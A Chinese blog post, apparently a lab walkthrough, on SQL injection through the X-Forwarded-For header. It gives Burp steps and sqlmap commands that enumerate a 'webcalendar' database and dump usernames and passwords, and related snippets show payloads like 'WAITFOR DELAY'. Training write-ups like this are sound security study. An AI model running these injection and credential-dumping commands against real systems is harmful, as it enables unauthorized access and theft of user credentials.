X-Forwarded-For注入漏洞实战

最新推荐文章于 2024-04-15 00:43:03 发布
最新推荐文章于 2024-04-15 00:43:03 发布
阅读量1.8k 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36933272/article/details/100503896
版权

浏览器设置代理,burp截断登陆请求的数据包

send to repeater,然后增加一行X-Forwarded-For:*,下一行留空

Go 保存response,改成txt文件

打开sqlmap,依次查出数据库、查询表名、查询列中的字段,如sqlmap -r txt文件路径 --dbs --batch(–batch 批处理,在检测过程中会问用户一些问题,使用这个参数统统使用默认值。)
sqlmap -r /opt/abc.txt -D webcalendar --tables --batch
sqlmap -r /opt/abc.txt -D webcalendar -T user --columns --batch
sqlmap -r /opt/abc.txt -D webcalendar -T user -C username,password --dump --batch

获得用户名密码,输入得到key 在这里插入图片描述

qq_36933272
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web站点获取用户IP的安全方法 HTTP_X_FORWARDED_FOR检验
01-20
安全过滤后的getIP函数 复制代码 代码如下:  function getIP() { $realip = ”; //设置默认值 if (isset($_SERVER[‘HTTP_X_FORWARDED_FOR’])) {  $realip = $_SERVER[‘HTTP_X_FORWARDED_FOR’]; } elseif (isset($_SERVER[‘HTTP_CLIENT_IP’])) {  $realip = $_SERVER[‘HTTP_CLIENT_IP’]; } else {  $realip = $_SERVER[‘REMOTE_ADDR’]; }  preg_mat
X-Forwarded-For火狐插件
01-10
X-Forwarded-For火狐插件
墨者 - X-Forwarded-For注入漏洞实战
吃肉唐僧的博客
07-10 3960
X-Forwarded-For 刷题之前先知道这个是什么东西,X-Forwarded-For 是一个 HTTP 扩展头部。HTTP/1.1(RFC 2616)协议并没有对它的定义,它最开始是由 Squid 这个缓存代理软件引入,用来表示 HTTP 请求端真实 IP。如今它已经成为事实上的标准,被各大 HTTP 代理、负载均衡等转发服务广泛使用,并被写入RFC 7239(Forwarded...
渗透测试-XFF漏洞攻击原理及防御方案
最新发布
lza20001103的博客
04-15 1954
渗透测试-XFF漏洞攻击原理及防御方案
x-forward-for和逻辑漏洞
weixin_48776804的博客
02-15 847
x-forward-forX-Forwarded-For逻辑漏洞 X-Forwarded-For (XFF)是用来识别ip地址 使用sqlmap跑 包的内容 POST /index.php HTTP/1.1 Host: 219.153.49.228:42344 X-Forwarded-For:127.0.0.1* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept:
Web应用程序漏洞-X-Forwarded-For注入
旺仔Sec&blog
07-20 2572
第二十八步,重新审阅刚刚获取os-shell时的日志,发现sqlmap在网站根目录下放置了一个tmpunjoh.php文件(文件名为随机,请注意),可以用于手动上传文件。可以看到,我们从X-Forwarded-For定义的内容,未经过筛选就执行了SQL语句用于查询该IP地址是否在白名单之内,且。第五步,一分钟后扫描结束,切换至Results标签页,可以看到/admin目录被扫描出来,推测该目录为管理员后台地址。第十六步,在BurpSuite中将X-Forwarded-For的值改为一个单引号(’)尝试。
利用X-Forwarded-For进行sql注入
wqj975005563的专栏
06-06 4501
由于系统一般会采用String ip = request.getHeader("X-Forwarded-For");进行获取ip,然后注入者就可以通过X-Forwarded-For请求头信息就行伪造ip,当然了这个ip也可以是一些注入语句,如下X-Forwarded-For:payload';WAITFOR DELAY '0:0:5'--String sql = "select * from ta...
Chrome插件:X-Forwarded-For Header
12-15
X-Forwarded-For Header插件,此扩展允许您快速设置X-Forwarded-For HTTP标头
forwarded:解析HTTP X-Forwarded-For标头
05-11
从请求中解析X-Forwarded-For标头。 以相反的顺序返回地址数组,包括req的套接字地址(即索引0是套接字地址,最后一个索引是最远的地址,通常是最终用户)。 测验 $ npm test 执照 麻省理工学院
X-Forwarded-For Header_0.6.2_0.zip
08-24
此扩展允许您快速更新各种 X-Forwarded-For、X-Originating-IP、X-Remote-IP 和 X-Remote-Addr HTTP 标头 打开Chrome浏览器的扩展程序: 地址栏直接输入:chrome://extensions/ 把下载到的文件解压后,点击加载已...
Golang中间件,用于处理X-Forwarded-For标头-Golang开发
05-26
Go软件包的X-Forwarded-For中间件xff是net / http中间件/处理程序,用于解析Golang中的Forwarded HTTP Extension。 用法示例安装xff:转到get github.com/sebest/xff编辑server.go:打包主X-Forwarded-For中间件转到...
sql注入x-forwarded-for
Vinson的博客
09-29 382
靶机192.168.1.103 攻击机192.168.1.108 nmap -sV 192.168.1.103 80/tcp open http nginx 0.7.67 avws漏洞扫描器 漏洞利用 利用sqlmap sqlmap -u url --headers="X-Forwarded-For:*" --dbs --batch sqlmap -u http://1...
x-forwarded-for手工注入(超详细)
1
05-12 1072
使用靶场来进行演示。 访问靶场后看到的是一个常见的后台的登录框,第一步肯定是先试一下看看有没有弱口令咯,试了几个发现并不存在弱口令,但是发现网站有一串乱码的弹窗如下 虽然是乱码,但是看到里面有ip,头发短见识多得我就想到了这大概率是记录下了我本机的ip(这里的ip是开了隧道的不是我的哦~)让我们来抓包看一下 这里可以看到转编码之后确实是记录了我的ip,但是在请求包中没有发现xff头,就很奇怪,自己加上。 发现xff头的内容是可以随便控制的,下面可以看到输入单引号是报错的,那就直接尝...
爆库记录(X-Forwarded-For注入漏洞实战 记录)
weixin_30684743的博客
09-15 250
环境位置:https://www.mozhe.cn/bug/detail/QWxmdFFhVURDay90L0wxdmJXSkl5Zz09bW96aGUmozhe 参考:http://www.freesion.com/article/176849949/ 墨者里面的题 都有解 获取登陆地址的请求信息 往请求头信息加入X-Forwarded-For:* 一起写入...
墨者学院 X-Forwarded-For注入漏洞实战
crasher123的博客
06-19 1707
SQLMap是一个基于Python编写的工具,因此需要安装Python。可以从Python官方网站下载Python安装包,也可以使用包管理器进行安装。如果Python已经安装,则会显示Python的版本号。请求信息中多加一条X-Forwarded-For:*得到库表名user和login,继续攻击user表。运行后会显示SQLMap的欢迎信息和命令行帮助。得到数据库名称为webcalender,进行扫描。安装burpsuite和sqlmap。2.安装Python。4.运行SQLMap。
墨者X-Forwarded-For注入漏洞实战
LGXJM20的博客
07-18 278
题目是X-Forwarded-For注入漏洞实战,我们先来brup抓包 brup抓包发现没有X-Forwarded-For头。就试试添加X-Forwarded-For:0.0.0.0试试,发现有回显 那我们就把把X-Forwarded-For的值设置为即X-Forwarded-For:,然后保存为1.txt 1.sqlmap -r 1.txt --dbs --batch爆库,注出information_schema库和webcalendar库 2.sqlmap -r 1.txt -D webcalen
小谈X-Forwarded-For
Healist的博客
12-28 1036
实际开发中我们经常会需要获取用户的ip地址,http的请求头X-Forwarded-For一般能为我们达到此目的。X-Forwarded-For 请求头格式:(示例如下)X-Forwarded-For: ip0, ip1, ip2这个 就表示用户真实ip地址为ip0,然后经过ip1的代理和ip2的代理才请求过来的。最后一层的代理是没有在X-Forwarded-For中出现的,最后一层代理的ip地址可
x-forwarded-for注入漏洞实战
03-17
x-forwarded-for注入漏洞是一种常见的网络安全漏洞,攻击者可以通过伪造HTTP请求头中的x-forwarded-for字段,来绕过IP地址过滤和访问控制,从而实现攻击目标系统的目的。攻击者可以利用这个漏洞来进行各种攻击,比如SQL注入、XSS攻击等。为了防止这种漏洞的发生,我们需要加强对网络安全的监控和管理,同时加强对网络应用程序的安全性测试和漏洞扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值